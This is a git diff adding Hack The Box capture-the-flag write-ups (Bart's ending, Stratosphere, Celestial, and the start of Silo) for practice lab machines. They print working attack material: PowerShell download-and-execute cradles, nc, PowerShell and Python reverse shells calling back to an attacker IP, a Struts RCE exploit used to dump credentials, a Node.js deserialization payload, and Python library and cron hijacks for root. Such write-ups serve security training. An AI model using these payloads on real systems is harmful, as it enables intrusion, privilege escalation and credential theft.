+ Location: https://github-production-release-asset-2e65be.s3.amazonaws.com/142582717/538c8db8-9c94-11e8-84e5-46a5d9473358?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20200315%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20200315T162338Z&X-Amz-Expires;=300&X-Amz-Signature;=ce85a8ad77f1a0147ad0815a54d198c71539339d9a10362e0f008ab3a0ce11c9&X-Amz-SignedHeaders;=host&actor;_id=0&response-content-disposition;=attachment%3B%20filename%3DJuicyPotato.exe&response-content-type;=application%2Foctet-stream [following]
+ --2020-03-15 16:23:30-- https://github-production-release-asset-2e65be.s3.amazonaws.com/142582717/538c8db8-9c94-11e8-84e5-46a5d9473358?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20200315%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20200315T162338Z&X-Amz-Expires;=300&X-Amz-Signature;=ce85a8ad77f1a0147ad0815a54d198c71539339d9a10362e0f008ab3a0ce11c9&X-Amz-SignedHeaders;=host&actor;_id=0&response-content-disposition;=attachment%3B%20filename%3DJuicyPotato.exe&response-content-type;=application%2Foctet-stream
+ Resolving github-production-release-asset-2e65be.s3.amazonaws.com (github-production-release-asset-2e65be.s3.amazonaws.com)... 52.216.228.40
+ Connecting to github-production-release-asset-2e65be.s3.amazonaws.com (github-production-release-asset-2e65be.s3.amazonaws.com)|52.216.228.40|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 347648 (340K) [application/octet-stream]
+ Saving to: ‘JuicyPotato.exe’
+
+ JuicyPotato.exe 100%[=========>] 339.50K 721KB/s in 0.5s
+
+ 2020-03-15 16:23:31 (721 KB/s) - ‘JuicyPotato.exe’ saved [347648/347648]
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → python -m SimpleHTTPServer 8081
+ Serving HTTP on 0.0.0.0 port 8081 ...
+
+
+` _Terminal 2:_
+
+
+ PS C:\inetpub\wwwroot\internal-01\simple_chat\includes> cd C:\Users\Public\Downloads
+ PS C:\Users\Public\Downloads> iex(new-object net.webclient).downloadfile('http://10.10.14.10:8081/JuicyPotato.exe','C:\Users\Public\Downloads\jp.exe')
+ PS C:\Users\Public\Downloads> Invoke-PowerShellTcp : Cannot bind argument to parameter 'Command' because it
+ is null.
+ At line:126 char:2
+ + }Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 9001
+ + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ + CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorExcep
+ tion
+ + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio
+ n,Invoke-PowerShellTcp
+
+
+ PS C:\Users\Public\Downloads> ls
+
+
+ Directory: C:\Users\Public\Downloads
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 15/03/2020 16:29 347648 jp.exe
+
+
+Once downloaded, we execute it :
+
+
+ PS C:\Users\Public\Downloads> ./jp.exe
+ JuicyPotato v0.1
+
+ Mandatory args:
+ -t createprocess call: <****t> CreateProcessWithTokenW, <****u> CreateProcessAsUser, <*> try both
+ -p <****program>: program to launch
+ -l <****port>: COM server listen port
+
+
+ Optional args:
+ -m <****ip>: COM server listen address (default 127.0.0.1)
+ -a <****argument>: command line argument to pass to program (default NULL)
+ -k <****ip>: RPC server ip address (default 127.0.0.1)
+ -n <****port>: RPC server listen port (default 135)
+ -c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
+ -z only test CLSID and print token's user
+
+
+Here we will need -t , -p and -l , so locally we'll copy yet another reverse shell from nishang, and add the correct line at the end of it :
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → locate Invoke-PowerShellTcp.ps1
+ /home/nihilist/_HTB/Bastard/Invoke-PowerShellTcp.ps1
+ /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 .
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → mv Invoke-PowerShellTcp.ps1 ech1.ps1
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 9002' >> ech1.ps1
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → nano shell.bat
+
+
+Next up we create the shell.bat file that will download and execute our ech1.ps1 reverse shell :
+
+
+ powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.10:8081/ech1.ps1')
+
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → python -m SimpleHTTPServer 8081
+ Serving HTTP on 0.0.0.0 port 8081 ...
+
+
+` _Terminal 3:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → nc -lvnp 9002
+
+
+Now we download and execute our shell.bat file that will download and execute our ech1.ps1 reverse shell so that we can grab the incoming reverse shell on our port 9002:
+
+_Terminal 2:_
+
+
+ iex(new-object net.webclient).downloadfile('http://10.10.14.10:8081/shell.bat','C:\Users\Public\Downloads\shell.bat')
+
+
+` 
+
+And it worked ! However the shell closes on us after a bit so we'll use our jp.exe in conjunction with a Windows 10 Pro CLSID available on Juicy Potato's github repository to finally get the reverse shell with SYSTEM privileges:
+
+
+
+And that's it ! we have been able to print out the user and root flags !
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/21.md b/Medium/21.md
new file mode 100644
index 0000000..f40e9ef
--- /dev/null
+++ b/Medium/21.md
@@ -0,0 +1,362 @@
+# Stratosphere Writeup
+
+
+
+## Introduction :
+
+Stratosphere is a Medium Linux box released back in March 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → nmap -sCV -p 22,80,8080 10.10.10.64
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-15 22:52 GMT
+ Nmap scan report for 10.10.10.64
+ Host is up (0.091s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
+ | 256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
+ |_ 256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (ED25519)
+ 80/tcp open http
+ | fingerprint-strings:
+ | FourOhFourRequest:
+ | HTTP/1.1 404
+ | Content-Type: text/html;charset=utf-8
+ | Content-Language: en
+ | Content-Length: 1114
+ | Date: Sun, 15 Mar 2020 22:53:54 GMT
+ | Connection: close
+ | GetRequest:
+ | HTTP/1.1 200
+ | Accept-Ranges: bytes
+ | ETag: W/"1708-1519762495000"
+ | Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
+ | Content-Type: text/html
+ | Content-Length: 1708
+ | Date: Sun, 15 Mar 2020 22:53:54 GMT
+ | Connection: close
+ | HTTPOptions:
+ | HTTP/1.1 200
+ | Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ | Content-Length: 0
+ | Date: Sun, 15 Mar 2020 22:53:54 GMT
+ | Connection: close
+ | RTSPRequest, X11Probe:
+ | HTTP/1.1 400
+ | Date: Sun, 15 Mar 2020 22:53:54 GMT
+ |_ Connection: close
+ | http-methods:
+ |_ Potentially risky methods: PUT DELETE
+ |_http-title: Stratosphere
+ 8080/tcp open http-proxy
+ | fingerprint-strings:
+ | FourOhFourRequest:
+ | HTTP/1.1 404
+ | Content-Type: text/html;charset=utf-8
+ | Content-Language: en
+ | Content-Length: 1114
+ | Date: Sun, 15 Mar 2020 22:53:54 GMT
+ | Connection: close
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 22.10 seconds
+
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 and 8080 running http so let's dirsearch both of them :
+
+
+
+Suprisingly both the dirsearch scans found the exact same directories :
+
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: txt, html, php, xml | HTTP method: get | Threads: 50 | Wordlist size: 220521
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-03-15_22-57-35.log
+
+ Target: http://10.10.10.64/
+
+ [22:57:35] Starting:
+ [22:57:36] 200 - 2KB - /
+ [22:57:58] 302 - 0B - /manager -> /manager/
+ [22:58:31] 302 - 0B - /Monitoring -> /Monitoring/
+ [22:59:07] 400 - 0B - /http%3A%2F%2Fwww
+ [23:00:58] 400 - 0B - /http%3A%2F%2Fyoutube
+ [23:01:46] 400 - 0B - /http%3A%2F%2Fblogs
+ [23:01:52] 400 - 0B - /http%3A%2F%2Fblog
+ [23:02:30] 400 - 0B - /%2A%2Ahttp%3A%2F%2Fwww
+
+
+So we investigate /manager:
+
+
+
+Which is a login form, so we move over to /Monitoring
+
+
+
+Here we see that we are redirected to the following link : **http://10.10.10.64:8080/Monitoring/example/Welcome.action** and that we can either sign on or register, however trying to register we see that we get an error:
+
+
+
+With the following URL :
+
+
+ http://10.10.10.64/Monitoring/example/Register.action;jsessionid=AFF9FBE2C10195E4BD717ABD893099E2
+
+
+Moving over to the Sign On page we try to login with a random username and password, and we get the following request:
+
+
+
+we'll leave that aside for now, and head back to the Monitoring homepage, we see that the extension .action is used instead of .do for apache struts actions. Struts is a model-view-controller framework for creating java web applications. Struts has suffered from a couple of vulnerabilities using the technique of object-graph navigation language (OGNL) injection. OGNL is an expression language that allows the setting of an object properties and execution of various methods of Java classes, which can be maliciously used to perform RCE attacks against Apache servers. Most notably [cve2017-5638](https://www.exploit-db/exploits/41570), to which we have a few exploits we can use:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → cd /usr/share/exploitdb
+
+ λ nihilist [ 10.10.14.10/23 ] [/usr/share/exploitdb]
+ → grep -Ri 2017-5638
+ exploits/linux/webapps/41570.py: print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
+ exploits/multiple/remote/41614.rb: ['CVE', '2017-5638'],
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → cp /usr/share/exploitdb/exploits/linux/webapps/41570.py .
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → nano 41570.py
+
+
+In it we can see that it is trying to abuse the Content-Type header by setting it to **%{(#_='multipart/form-data').(payload)** :
+
+
+
+we can even check if it is vulnerable to this particular CVE by using nmap's --script flag:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → nmap -p8080 --script http-vuln-cve2017-5638 --script-args path=/Monitoring/ 10.10.10.64
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 08:44 GMT
+ Nmap scan report for 10.10.10.64
+ Host is up (0.094s latency).
+
+ PORT STATE SERVICE
+ 8080/tcp open http-proxy
+ | http-vuln-cve2017-5638:
+ | VULNERABLE:
+ | Apache Struts Remote Code Execution Vulnerability
+ | State: VULNERABLE
+ | IDs: CVE:CVE-2017-5638
+ | Apache Struts 2.3.5 - Struts 2.3.31 and Apache Struts 2.5 - Struts 2.5.10 are vulnerable to a Remote Code Execution
+ | vulnerability via the Content-Type header.
+ |
+ | Disclosure date: 2017-03-07
+ | References:
+ | https://cwiki.apache.org/confluence/display/WW/S2-045
+ | http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
+ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
+
+
+And it looks like it is vulnerable, so let's test it out but be careful that the final / of the URL is important otherwise you won't get any results:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → python 41570.py http://10.10.10.64:8080/Monitoring id
+ [*] CVE: 2017-5638 - Apache Struts2 S2-045
+ [*] cmd: id
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → python 41570.py http://10.10.10.64:8080/Monitoring/ id
+ [*] CVE: 2017-5638 - Apache Struts2 S2-045
+ [*] cmd: id
+
+ uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → python 41570.py http://10.10.10.64:8080/Monitoring/ "cat /home/richard/user.txt"
+ [*] CVE: 2017-5638 - Apache Struts2 S2-045
+ [*] cmd: cat /home/richard/user.txt
+
+ cat: /home/richard/user.txt: Permission denied
+
+
+
+And we get RCE as tomcat8 ! However trying to print the user richard flag we see that we need to privesc so you could try to get a reverse shell but it may be tedious since we'll find out later on that the box has iptables configured. So first we print out the db_connect file contents to see if we can grab credentials:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → python 41570.py http://10.10.10.64:8080/Monitoring/ "ls"
+ [*] CVE: 2017-5638 - Apache Struts2 S2-045
+ [*] cmd: ls
+
+ conf
+ db_connect
+ lib
+ logs
+ policy
+ webapps
+ work
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → python 41570.py http://10.10.10.64:8080/Monitoring/ "cat db_connect"
+ [*] CVE: 2017-5638 - Apache Struts2 S2-045
+ [*] cmd: cat db_connect
+
+ [ssn]
+ user=ssn_admin
+ pass=AWs64@on*&
+
+ [users]
+ user=admin
+ pass=admin
+
+
+
+You may be tempted to use the ssn_admin:AWs64@on*& creds but as a matter of fact we'll use the default credentials admin:admin to log into mysql and print out other credentials:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → python 41570.py http://10.10.10.64:8080/Monitoring/ **"** mysql -u admin **-p admin** -e "use users;select * from accounts"**"**
+
+
+This above is incorrect since we have to use a pair of singlequotes and doublequotes instead of 2 pairs of doublequotes, moreso the -p admin syntax is incorrect because you need to spell it this way (-padmin) so now we correct our command :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → python 41570.py http://10.10.10.64:8080/Monitoring/ **'** mysql -u admin **-padmin** -e "use users;select * from accounts"**'**
+ [*] CVE: 2017-5638 - Apache Struts2 S2-045
+ [*] cmd: mysql -u admin -padmin -e "use users;select * from accounts"
+
+ fullName password username
+ Richard F. Smith 9tc*rhKuG5TyXvUJOrE^5CK7k richard
+
+
+And we have credentials ! richard:9tc*rhKuG5TyXvUJOrE^5CK7k so we log into the machine via ssh:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → ssh richard@10.10.10.64
+ The authenticity of host '10.10.10.64 (10.10.10.64)' can't be established.
+ ECDSA key fingerprint is SHA256:tQZo8j1TeVASPxWyDgqJf8PaDZJV/+LeeBZnjueAW/E.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.64' (ECDSA) to the list of known hosts.
+ richard@10.10.10.64's password:
+ Linux stratosphere 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u2 (2018-02-21) x86_64
+
+ The programs included with the Debian GNU/Linux system are free software;
+ the exact distribution terms for each program are described in the
+ individual files in /usr/share/doc/*/copyright.
+
+ Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+ permitted by applicable law.
+ Last login: Tue Feb 27 16:26:33 2018 from 10.10.14.2
+ richard@stratosphere:~$ cat user.txt
+ e6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now our first reflex to enumerate a box is by typing sudo -l to see if we can execute anything with root privileges as the current user:
+
+
+ richard@stratosphere:~$ sudo -l
+ Matching Defaults entries for richard on stratosphere:
+ env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
+
+ User richard may run the following commands on stratosphere:
+ (ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py
+
+
+
+ richard@stratosphere:~$ cat /home/richard/test.py
+ #!/usr/bin/python3
+ import hashlib
+
+
+ def question():
+ q1 = input("Solve: 5af003e100c80923ec04d65933d382cb\n")
+ md5 = hashlib.md5()
+ md5.update(q1.encode())
+ if not md5.hexdigest() == "5af003e100c80923ec04d65933d382cb":
+ print("Sorry, that's not right")
+ return
+ print("You got it!")
+ q2 = input("Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff\n")
+ sha1 = hashlib.sha1()
+ sha1.update(q2.encode())
+ if not sha1.hexdigest() == 'd24f6fb449855ff42344feff18ee2819033529ff':
+ print("Nope, that one didn't work...")
+ return
+ print("WOW, you're really good at this!")
+ q3 = input("How about this? 91ae5fc9ecbca9d346225063f23d2bd9\n")
+ md4 = hashlib.new('md4')
+ md4.update(q3.encode())
+ if not md4.hexdigest() == '91ae5fc9ecbca9d346225063f23d2bd9':
+ print("Yeah, I don't think that's right.")
+ return
+ print("OK, OK! I get it. You know how to crack hashes...")
+ q4 = input("Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943\n")
+ blake = hashlib.new('BLAKE2b512')
+ blake.update(q4.encode())
+ if not blake.hexdigest() == '9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943':
+ print("You were so close! urg... sorry rules are rules.")
+ return
+
+ import os
+ os.system('/root/success.py')
+ return
+
+ question()
+
+
+Here we can see a bunch of crackable hashes (which are actually rabbitholes lol), the real vulnerability here is into the libraries that this python script calls : hashlib.py
+
+
+ richard@stratosphere:/usr/lib/python3.5$ cd ~
+ richard@stratosphere:~$ cd /usr/lib/python3.5
+ richard@stratosphere:/usr/lib/python3.5$ ls -lash | grep hashlib
+ 8.0K -rw-r--r-- 1 root root 7.8K Jan 19 2017 hashlib.py
+
+
+
+Obviously we cannot write into this hashlib.py file since we do not have enough permissions to do so, therefore we will create our own hashlib.py in the SAME FOLDER as our test.py and it will take priority over the hashlib we found above. With our own hashlib.py we are able to achieve a privilege escalation via python-library hijacking as demonstrated below :
+
+
+ richard@stratosphere:~$ pwd
+ /home/richard
+
+ richard@stratosphere:~$ ls
+ Desktop test.py user.txt
+
+ richard@stratosphere:~$ echo 'import os;os.system("/bin/bash")' > hashlib.py
+ richard@stratosphere:~$ sudo /usr/bin/python /home/richard/test.py
+ root@stratosphere:/home/richard# id
+ uid=0(root) gid=0(root) groups=0(root)
+
+ root@stratosphere:/home/richard# cat /root/root.txt
+ d4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/22.md b/Medium/22.md
new file mode 100644
index 0000000..42e9fa8
--- /dev/null
+++ b/Medium/22.md
@@ -0,0 +1,195 @@
+# Celestial Writeup
+
+
+
+## Introduction :
+
+Celestial is a Medium linux box released back in March 2018
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Celestial]
+ → nmap -F 10.10.10.85
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 09:26 GMT
+ Nmap scan report for 10.10.10.85
+ Host is up (0.38s latency).
+ Not shown: 99 closed ports
+ PORT STATE SERVICE
+ 3000/tcp open ppp
+
+ Nmap done: 1 IP address (1 host up) scanned in 2.82 seconds
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Celestial]
+ → nmap -sCV -p3000 10.10.10.85
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 09:27 GMT
+ Nmap scan report for 10.10.10.85
+ Host is up (0.43s latency).
+
+ PORT STATE SERVICE VERSION
+ 3000/tcp open http Node.js Express framework
+ |_http-title: Site doesn't have a title (text/html; charset=utf-8).
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 20.06 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 3000 so let's investigate it:
+
+
+
+Note that the http service running on port 3000 is preety slow / gets throttled so we cannot reasonably use dirsearch. Now since it's quite weird to get 2 different results from curl and from our webbrowser we'll investigate it by using burpsuite, intercepting our request using the interceptor and foxyproxy, and sending it over to the repeater (CTRL+R) and going there (CTRL+SHIFT+R) to see what we're dealing with exactly :
+
+
+
+Now what's interesting here is the cookie's profile parameter which contains a base64 encoded string:
+
+
+
+Do not forget to URL-Decode the base64 encoded string because as you can see the 2 last = signs have been url encoded to %3D.
+
+
+
+From there we get a JSON object parsing where 2+2 equals to 22. here when we look at our last part of the json object we have x"num":"2") so we could assume that we can misuse this concatenation and chain RCE to it. So let's try out a generic Node.js parsing and serialization vulnerability:
+
+_Original JSON:_
+
+
+ {"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}
+
+
+` _Infected JSON:_
+
+
+ {"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat/tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 9001 >/tmp/f', function(error, stdout, stderr) { console.log(stdout) });}()"}
+
+
+Therefore we obtain the combination of the two which is what we're going to use on this box :
+
+
+ {"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2","rce":"_$$ND_FUNC$$_function (){require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 9001 >/tmp/f', function(error, stdout, stderr) { console.log(stdout) });}()"}
+
+
+Now as we have seen above, we need to first base64 encode it:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Celestial]
+ → nano infected
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Celestial]
+ → cat infected | base64
+ eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVt
+ YiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIiLCJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rp
+ b24gKCl7cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3JtIC90bXAvZjtta2ZpZm8gL3Rt
+ cC9mO2NhdCAvdG1wL2Z8L2Jpbi9zaCAtaSAyPiYxfG5jIDEwLjEwLjE0LjEwIDkwMDEgPi90bXAv
+ ZicsIGZ1bmN0aW9uKGVycm9yLCBzdGRvdXQsIHN0ZGVycikgeyBjb25zb2xlLmxvZyhzdGRvdXQp
+ IH0pO30oKSJ9Cg==
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Celestial]
+ → nc -lvnp 9001
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9001
+ Ncat: Listening on 0.0.0.0:9001
+
+
+We have to also URL-Encode this base64 encoded string because we have a few + and = signs in there, we encode the string inside burpsuite by selecting the string and then by pressing CTRL+U and then hit send to get our reverse shell connection:
+
+
+
+And we get a reverse shell ! now we just need to grab the user flag:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Celestial]
+ → nc -lvnp 9001
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9001
+ Ncat: Listening on 0.0.0.0:9001
+ Ncat: Connection from 10.10.10.85.
+ Ncat: Connection from 10.10.10.85:58818.
+ /bin/sh: 0: can't access tty; job control turned off
+ $ whoami
+ sun
+
+ $ cat /home/sun/Documents/user.txt
+ 9aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we have been able to print out the user flag !
+
+## **Part 3 : Getting Root Access**
+
+From there, our first reflex is to try out sudo -l after we spawned a tty shell using python's pty module:
+
+
+ $ sudo -l
+ sudo: no tty present and no askpass program specified
+ $ which python
+ /usr/bin/python
+ $ python -c 'import pty;pty.spawn("/bin/bash")'
+ sun@sun:~/Documents$ sudo -l
+ sudo -l
+ [sudo] password for sun:
+
+
+but we're out of luck, so we poke around the box and we find a writeable python script in /home/sun/Documents :
+
+
+ sun@sun:~/Documents$ ls -lash
+ ls -lash
+ total 16K
+ 4.0K drwxr-xr-x 2 sun sun 4.0K Mar 4 2018 .
+ 4.0K drwxr-xr-x 21 sun sun 4.0K Mar 16 05:23 ..
+ 4.0K -rw-rw-r-- 1 sun sun 29 Sep 21 2017 script.py
+ 4.0K -rw-rw-r-- 1 sun sun 33 Sep 21 2017 user.txt
+
+
+The script in there is being executed by cron as root every 5 minutes, so we can just place our python reverse shell one liner in there and get a root reverse shell once cron executes it.
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Celestial]
+ → nc -lvnp 9002
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9002
+ Ncat: Listening on 0.0.0.0:9002
+
+
+
+` _Terminal 2:_
+
+
+ sun@sun:~/Documents$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > script.py
+
+
+` _Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Celestial]
+ → nc -lvnp 9002
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9002
+ Ncat: Listening on 0.0.0.0:9002
+ Ncat: Connection from 10.10.10.85.
+ Ncat: Connection from 10.10.10.85:43524.
+ /bin/sh: 0: can't access tty; job control turned off
+
+ # id && cat /root/root.txt
+ uid=0(root) gid=0(root) groups=0(root)
+ baXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it ! We have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/23.md b/Medium/23.md
new file mode 100644
index 0000000..4898ce3
--- /dev/null
+++ b/Medium/23.md
@@ -0,0 +1,384 @@
+# Silo Writeup
+
+
+
+## Introduction :
+
+Silo is a Medium windows box released back in March 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Silo]
+ → nmap -F 10.10.10.82
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 10:50 GMT
+ Nmap scan report for 10.10.10.82
+ Host is up (0.098s latency).
+ Not shown: 92 closed ports
+ PORT STATE SERVICE
+ 80/tcp open http
+ 135/tcp open msrpc
+ 139/tcp open netbios-ssn
+ 445/tcp open microsoft-ds
+ 49152/tcp open unknown
+ 49153/tcp open unknown
+ 49154/tcp open unknown
+ 49155/tcp open unknown
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.65 seconds
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB]
+ → nmap -sCV -p80,135,139,445 10.10.10.82
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 10:51 GMT
+ Nmap scan report for 10.10.10.82
+ Host is up (0.15s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+ |_http-server-header: Microsoft-IIS/8.5
+ |_http-title: IIS Windows Server
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
+ Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: 1m22s, deviation: 0s, median: 1m21s
+ |_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: supported
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2020-03-16T10:52:49
+ |_ start_date: 2020-03-16T10:51:55
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 35.03 seconds
+
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+So we are greeted by a default Windows Server IIS webpage, so we could use dirsearch on it but it won't give us much results that we can use. So we'll move onto the next ports: 135,139 & 445 which are giving an oracle database for us to work with, onto which we'll use the [ODat](https://github.com/quentinhardy/odat) tool. So first let's install it :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Silo]
+ → git clone https://github.com/quentinhardy/odat
+ Cloning into 'odat'...
+ remote: Enumerating objects: 180, done.
+ remote: Counting objects: 100% (180/180), done.
